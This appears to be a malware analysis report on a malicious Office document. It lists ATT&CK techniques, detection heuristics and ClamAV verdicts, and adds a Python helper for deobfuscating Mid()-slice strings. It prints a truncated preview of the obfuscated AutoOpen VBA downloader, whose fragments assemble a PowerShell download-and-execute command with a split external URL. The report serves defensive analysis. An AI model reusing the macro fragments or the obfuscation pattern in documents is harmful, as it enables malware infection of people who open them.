MALICIOUS (Risk Score 302)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious Office (OLE) document carrying a VBA macro with an AutoOpen entry point, so the code runs as soon as the document is opened with macros enabled (T1204.002, T1059.005). The macro calls Shell(), i.e. it launches an external process. The recovered source is heavily obfuscated: most statements are junk arithmetic on undefined variables (kept from faulting only by On Error Resume Next), interleaved with Mid() calls that slice fragments out of padded string literals. The fragments visible in the preview contain PowerShell pieces (.ToString(), .rePlAcE(, [chAR], a foreach loop and a split http:/'+'/www. prefix), which is how a download-and-execute command is assembled at run time; this matches the downloader behaviour the dropper signature describes. Two caveats for the analyst: the only URL the static extractor recovered (http://schemas.openxmlformats.org/drawingml/2006/main) is the standard DrawingML namespace and is not the download location, which exists only after the string is rebuilt; and the artifact table's "Obfuscation or payload: unlikely" score is contradicted by the source itself and by the Doc.Trojan.Obfuscated verdict on the extracted macro. The legacy WordBasic heuristic fired on the same AutoOpen marker; its "no modern VBA project was recovered" wording does not apply here, since the full VBA project was extracted. ClamAV detections on the container (Img.Dropper.PhishingLure-6443153-0) and on the extracted macro (Doc.Trojan.Obfuscated-6443078-0) corroborate the verdict.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | Detection |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73893 bytes | ClamAV: Doc.Trojan.Obfuscated-6443078-0; obfuscation or payload: unlikely |

SHA-256 of macros.bas: 2c32ae464a31f24d177952ba82dc4badfda251f76f8031f2371c49630a121b52
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "tdsWwfJjr"
Function BmhDjZa()
On Error Resume Next
YMbLAXTWMuz = 44224474 / AiDjHhrYvM - 536083786 + CSng(fQjkdVN) + 2 - Chr(7013) - MVvphoPbXmGaHE / 8527 * oKrrSzYolnMlkY + Fix(7798) + 9905 * Sin(7) / 310 * Sin(GEcKwCF)
iRKri = 44224474 / mYPDvcc - 536083786 + CSng(soYcYumbb) + 2 - Chr(7013) - cozFQiMWjQMM / 8527 * osvYZjPMhz + Fix(7798) + 9905 * Sin(7) / 310 * Sin(RBHpjZpFI)
KGdnAIiUQM = Mid("H5MQzv1NdDoYDC+YDCwnltwC+twCoYDC+YDCadFileYDC+YD'+'C(YDC+YDCtwC+twC2z8abcYDC+twC+twCYD'+'C.ToString(),YDC+twC+twCYDC 2z8huaYDC+YDCs);InvoYD'+'C+YDCk'+'e-IteYDC+YDCm(2z8huas);bYDC+YDCrYDC+YDCeak;}cYkzOwCfjCfJJYN8YjPilO7EwhD", 10, 188)
rwNrGzZDVkY = 44224474 / WsrGTlplwbQuZ - 536083786 + CSng(duuohJBUCiDT) + 2 - Chr(7013) - BzwIwjRVzat / 8527 * CvBPJTd + Fix(7798) + 9905 * Sin(7) / 310 * Sin(UahQIVvrBpM)
EwKNaavdJtn = 44224474 / tNYUTtWi - 536083786 + CSng(TGLdiHmqCLHSGd) + 2 - Chr(7013) - RajHiXN / 8527 * MtCupuXG + Fix(7798) + 9905 * Sin(7) / 310 * Sin(nIdHDvIZFFuqVt)
rDbjpq = 44224474 / zFonATU - 536083786 + CSng(IPdUBjfO) + 2 - Chr(7013) - FsLZoLaPjAaoaU / 8527 * NqFwHNOq + Fix(7798) + 9905 * Sin(7) / 310 * Sin(SWEwNOZqjrwwBd)
waHvaz = Mid("J84HR0+[chAR]122t'+'wC+twC+[chAR]56),YDCCxcYDC).rePlAcE((zPrTD65wHf", 6, 52)
aFTVm = 44224474 / jVDsJOzYFtwkf - 536083786 + CSng(wwfFLizA) + 2 - Chr(7013) - NfbidRTWqAPKTq / 8527 * wjokXNFKcMI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(OlKOpiaq)
dtmbrWX = 44224474 / rjLAwjnazqZj - 536083786 + CSng(itfXiqr) + 2 - Chr(7013) - tmKpDqHC / 8527 * zWzSafoRj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(CWdVlwA)
QYnzO = 44224474 / ijVGlXHj - 536083786 + CSng(BcFAIfqMc) + 2 - Chr(7013) - HUwVVIFkjlZc / 8527 * AROzSimpzbMKf + Fix(7798) + 9905 * Sin(7) / 310 * Sin(OciYcFt)
oUjVhNQsD = Mid("CnQ2mIMpx/YDC+YDC,http:/'+'/www.YDC+YDCbrYDC'+'+YDCejkYDC+YDCish.YDC+YDCse/OkH4YDC+twC+twCYDC/,htYuC4ZiiVz", 8, 91)
BtZRJpCBz = 44224474 / jwAuPCXwwAL - 536083786 + CSng(pfYktDjlIOrGBl) + 2 - Chr(7013) - nQRZsCLYDMDGz / 8527 * binGlPXwschMPW + Fix(7798) + 9905 * Sin(7) / 310 * Sin(HusdNkifbS)
QbDwow = 44224474 / aEfTCfn - 536083786 + CSng(rMVkAMCBGFN) + 2 - Chr(7013) - PrYjVnPjMcBowO / 8527 * QGRYtCM + Fix(7798) + 9905 * Sin(7) / 310 * Sin(iHXwiHod)
SENrn = 44224474 / iGVXpwmqhfDzP - 536083786 + CSng(RpXorjmoEv) + 2 - Chr(7013) - KdkKtDMnt / 8527 * RcVmkaZpoEud + Fix(7798) + 9905 * Sin(7) / 310 * Sin(wvKqjmFp)
YHNFRSwYf = Mid("JF9wZCfLi98k4Rsww+YDC2z8nsadasd.n'+'ext(1, 34YDC+YD'+'C3245);2z8hYDC+YDCuas =YDC+YDC 2z8enYDC+YDCv:public + tYU3WitYYDC+YDCUYDC+YDC + 2z8YDC+YDCkYDC+Yt'+'wC+twCDCaraYDC+YDCp'+'as t'+'wC+twREfdl1Pm", 18, 171)
ztvOVko = 44224474 / rpmijzwOQEPP - 536083786 + CSng(jolKmvph) + 2 - Chr(7013) - zDiqYwrjb / 8527 * zUwGbTkHTJ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(wwzXaiKYVtn)
qSGwijOd = 44224474 / qdWNEWLURaHG - 536083786 + CSng(kzdCAnH) + 2 - Chr(7013) - fYmYtrqTP / 8527 * YFhwPzrbJfjjI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(zOslQaVi)
LmlrNi = 44224474 / YsjDpaAWkcrQqk - 536083786 + CSng(JqCnWXqwGhTw) + 2 - Chr(7013) - jHFiLUYNr / 8527 * uhSmsVEjj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BBiTFRcitcWVc)
VjwSzZMW = Mid("EuObocv0nBwonC+twC+twC tYDC+YDCYYtwC+twCDC+YDCUYDC+YDC.exYDC+YDCetYYDC+YDC'+'U;foYDC+YDCrea'+'ch(2z8YDC+YDCabc iYDC+YDCn 2z8YDC+YDCbcdYDC'+'+YDC'+')YDC+twC+twCYD'+'C{YDC+YDCtry{2zYDC+YDC8fYDC+YDCranc.ulsJJfJCY3iaHULj9", 14, 187)
PobpRaplU = 44224474 / XKEkoLiVAC - 536083786 + CSng(iAVnhiLYichw) + 2 - Chr(7013) - aYfzFCoXq / 8527 * KlKOCQiJjjbd + Fix(7798) + 9905 * Sin(7) / 310 * Sin(sEDmPwEspOoJQf)
QnfnrwczJj = 44224474 / AJWXAYSzXMr - 536083786 + CSng(sVsSmhR) + 2 - Chr(7013) - YXtvrPfBdjd / 8527 * sYfOjREB + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BbzwprsoWu)
Jifzkhv = 44224474 / QzOJsQKBWPI - 536083786 + CSng(zSBPpzZm) + 2 - Chr(7013) - BQZblrUXWFmkzt / 8527 * SRkiiCjXG
```

... (truncated)
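The preview shows the whole obfuscation pattern: dead arithmetic lines that only survive because of On Error Resume Next, and Mid("literal", start, length) slices that carry the real payload. The script below is an added example for this report, not part of the analyzer or of oletools; it statically recovers those slices from the macros.bas that olevba extracted. It assumes the macro's only string-building primitive is Mid() over a constant literal, that any assignment whose right-hand side has no string literal and no side-effecting call (Shell, CreateObject, Run and the like) is junk, and that the '+' sequences inside the fragments are PowerShell string concatenation and can be removed. The YDC, twC and 2z8 tokens are deliberately left alone: what they stand for is decided by the .rePlAcE() calls later in the script, which the preview does not show, so decoding them here would be a guess. The embedded SAMPLE is constructed in the same shape as the preview and is not taken from the macro.

```python
"""
Static recovery of Mid()-slice fragments from an obfuscated VBA macro.

Added example, not the analyzer's or oletools' code. Assumptions: payload strings are
built only with Mid("literal", start, length); arithmetic assignments between them are
dead code; '+' inside fragments is PowerShell concatenation noise. Placeholder tokens
(YDC, twC, 2z8) are kept verbatim because their replacement rules are not in the preview.
"""
import re
import sys

# `name = <expr>`; the right-hand side decides whether the line is junk or payload.
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
# Mid("literal", start, length) or Mid$(...) with a constant literal and constant bounds.
MID_RE = re.compile(r'Mid\$?\(\s*"((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)', re.I)
# Calls that must never be discarded as junk even when the line has no string literal.
SIDE_EFFECT_RE = re.compile(r'\b(Shell|CreateObject|GetObject|Call|Run|Open|Exec|Environ)\b', re.I)


def vba_mid(text, start, length):
    """Emulate VBA Mid(): start is 1-based; a length past the end is clipped, not an error."""
    if start < 1 or length < 0:
        raise ValueError("Mid(): start must be >= 1 and length >= 0")
    return text[start - 1:start - 1 + length]


def extract_fragments(source):
    """Walk the macro once. Returns (fragments, kept): fragments is a list of
    (variable, recovered_string) in source order; kept holds every line that is neither a
    Mid() assignment nor recognised junk arithmetic, i.e. what the analyst still has to read."""
    fragments, kept = [], []
    for raw in source.splitlines():
        line = raw.rstrip()
        assign = ASSIGN_RE.match(line)
        if assign:
            name, rhs = assign.groups()
            mid = MID_RE.search(rhs)
            if mid:
                literal = mid.group(1).replace('""', '"')   # VBA escapes " as ""
                fragments.append((name, vba_mid(literal, int(mid.group(2)), int(mid.group(3)))))
                continue
            if '"' not in rhs and not SIDE_EFFECT_RE.search(rhs):
                continue                                      # junk arithmetic, drop it
        kept.append(line)
    return fragments, kept


def join_fragments(fragments):
    """Concatenate in source order. Assumption: the macro assembles them in that order;
    confirm against the (truncated) assembly code before trusting the result."""
    return "".join(value for _, value in fragments)


def strip_ps_concat(text):
    """Remove '+' concatenation noise: 'abc'+'def' evaluates to abcdef in PowerShell."""
    return text.replace("'+'", "")


# Constructed sample in the same shape as the preview (not taken from the real macro).
SAMPLE = """Function Demo()
On Error Resume Next
a = 44224474 / b - 536083786 + CSng(c) + 2 - Chr(7013)
frag1 = Mid("xxxxhttp:/'+'/exa", 5, 13)
d = 9905 * Sin(7) / 310 * Sin(e)
frag2 = Mid("zzmple.invalid/p", 3, 14)
End Function
"""

if __name__ == "__main__":
    # Usage: python mid_slices.py macros.bas   (with no argument, runs on the constructed sample)
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    frags, kept = extract_fragments(src)
    for name, value in frags:
        print(f"{name:>16} = {value!r}")
    print("joined :", strip_ps_concat(join_fragments(frags)))
    print("kept   :", len(kept), "non-junk lines")
```

Run it against the extracted macros.bas and read the kept lines first: those are the statements that actually reach Shell(), and they contain the .rePlAcE() rules that turn the placeholder tokens into the final PowerShell command and the real download URL.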